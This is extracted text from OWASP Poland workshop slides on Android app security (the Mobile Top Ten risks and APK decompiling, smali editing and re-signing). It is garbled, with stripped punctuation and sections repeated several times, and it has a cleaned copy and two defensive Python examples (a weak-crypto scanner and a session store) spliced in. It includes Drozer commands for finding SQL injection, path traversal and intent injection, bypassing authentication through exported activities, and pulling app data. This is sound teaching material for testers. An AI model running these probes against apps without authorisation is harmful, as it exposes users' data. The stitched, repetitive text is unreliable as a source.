Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/framework puts sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <package_name> <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test account lockout policy
• Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
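The "how to find" steps above (decompile, then look for hardcoded keys and weak algorithms) are usually done by reading the JD-GUI output by hand; as an added example, not from the workshop, here is a small Python triage scanner that runs those checks over decompiled Java source. The Java it scans is a constructed sample shaped like dex2jar/JD-GUI output, and the rule list is an assumption of what a reviewer would grep for, not an exhaustive one.

```python
"""Static scan of decompiled Java for the M6 indicators listed in the
slides: hardcoded keys/passwords and weak or deprecated algorithms.
Added example, not part of the workshop material; the Java snippet it
scans is constructed to look like dex2jar/JD-GUI output."""
import re
from dataclasses import dataclass

# Constructed sample of what a decompiled class might look like.
SAMPLE_JAVA = """\
package com.example.vault;
public class DbHelper {
    private static final String DB_PASSWORD = "s3cretDbPass!";
    private static final byte[] KEY = "0123456789abcdef".getBytes();
    void open() {
        SQLiteDatabase.openDatabase(path, DB_PASSWORD, null, 0);
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        MessageDigest md = MessageDigest.getInstance("MD5");
        Cipher rc4 = Cipher.getInstance("RC4");
        SecretKeySpec k = new SecretKeySpec(KEY, "AES");
    }
}
"""


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    snippet: str


# (rule name, regex). Patterns are deliberately simple: a triage aid for
# the reviewer reading the decompiled code, not a proof of vulnerability.
RULES = [
    ("weak-digest",
     re.compile(r'MessageDigest\.getInstance\(\s*"(MD2|MD4|MD5|SHA-?1)"')),
    ("weak-cipher",
     re.compile(r'Cipher\.getInstance\(\s*"(RC4|ARCFOUR|DES|DESede|Blowfish)')),
    ("ecb-mode",
     re.compile(r'Cipher\.getInstance\(\s*"[A-Za-z0-9]+/ECB/')),
    ("hardcoded-secret",
     re.compile(r'(?i)(password|passwd|secret|api_?key|token)\w*\s*=\s*"[^"]+"')),
    # A literal string turned into key material, the pattern behind the
    # "hardcoded password to decrypt the db" slide.
    ("hardcoded-key-bytes", re.compile(r'"[^"]{8,}"\.getBytes\(')),
    ("hardcoded-key-bytes", re.compile(r'new SecretKeySpec\(\s*"[^"]+"')),
]


def scan_java(source: str) -> list[Finding]:
    """Return one Finding per (line, rule) hit, in source order."""
    findings = []
    for lineno, text in enumerate(source.splitlines(), start=1):
        for rule, pattern in RULES:
            if pattern.search(text):
                findings.append(Finding(lineno, rule, text.strip()))
    return findings


def rules_hit(source: str) -> set[str]:
    """Convenience view: the set of rule names triggered by `source`."""
    return {f.rule for f in scan_java(source)}


if __name__ == "__main__":
    for f in scan_java(SAMPLE_JAVA):
        print(f"line {f.line:>3} [{f.rule}] {f.snippet}")
```

Every hit still needs a human look: a flagged `MD5` used only for a cache key is not a vulnerability, while a clean scan says nothing about custom or obfuscated crypto.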
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via an intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity being started, etc.) via special objects called Intents:

  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent j = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);

Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
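The four mitigations above, and the three checks under "how to find", map onto a handful of server-side operations; as an added example that is not workshop code, here is a minimal Python session store that implements them: CSPRNG tokens, idle and absolute expiry enforced on the server, destruction on logout, and token rotation whenever the authentication state changes. The timeouts are assumed values and the clock is injectable so expiry can be exercised offline.

```python
"""Server-side session store illustrating the M9 mitigations from the
slides: high-entropy tokens, server-side expiry/invalidation, and token
rotation when the authentication state changes. Added example, not
workshop code; the clock is injectable so expiry can be tested offline."""
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class Session:
    user_id: str
    created: float
    last_seen: float


class SessionStore:
    def __init__(self, idle_timeout: float = 30 * 60,
                 absolute_timeout: float = 12 * 3600,
                 clock: Callable[[], float] = time.time):
        # Idle timeout mirrors the slide's "try the cookie after 30 minutes";
        # the absolute timeout bounds a session even if it stays active.
        # Both values are assumptions; tune them to the application.
        self.idle_timeout = idle_timeout
        self.absolute_timeout = absolute_timeout
        self._clock = clock
        self._sessions: Dict[str, Session] = {}

    @staticmethod
    def _new_token() -> str:
        # 256 bits from the OS CSPRNG. Never derive a token from a device ID,
        # username or timestamp: all of those are guessable by an attacker.
        return secrets.token_urlsafe(32)

    def create(self, user_id: str) -> str:
        now = self._clock()
        token = self._new_token()
        self._sessions[token] = Session(user_id, now, now)
        return token

    def validate(self, token: str) -> Optional[str]:
        """Return the user id for a live session, or None.

        Expired sessions are deleted on sight so the token cannot be replayed
        later; lookup is by exact key, so a partially guessed token is useless.
        """
        sess = self._sessions.get(token)
        if sess is None:
            return None
        now = self._clock()
        if (now - sess.last_seen > self.idle_timeout
                or now - sess.created > self.absolute_timeout):
            del self._sessions[token]
            return None
        sess.last_seen = now
        return sess.user_id

    def invalidate(self, token: str) -> None:
        """Logout: destroy the token server-side, not just on the client."""
        self._sessions.pop(token, None)

    def rotate(self, token: str) -> Optional[str]:
        """Issue a fresh token and destroy the old one.

        Call this whenever the authentication state changes (login, privilege
        change, switching users) so a token captured before the change is
        worthless afterwards.
        """
        user = self.validate(token)
        if user is None:
            return None
        self.invalidate(token)
        return self.create(user)

    def invalidate_all_for(self, user_id: str) -> int:
        """Destroy every session of one user (e.g. after a password change)."""
        dead = [t for t, s in self._sessions.items() if s.user_id == user_id]
        for t in dead:
            del self._sessions[t]
        return len(dead)
```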
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompilers
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
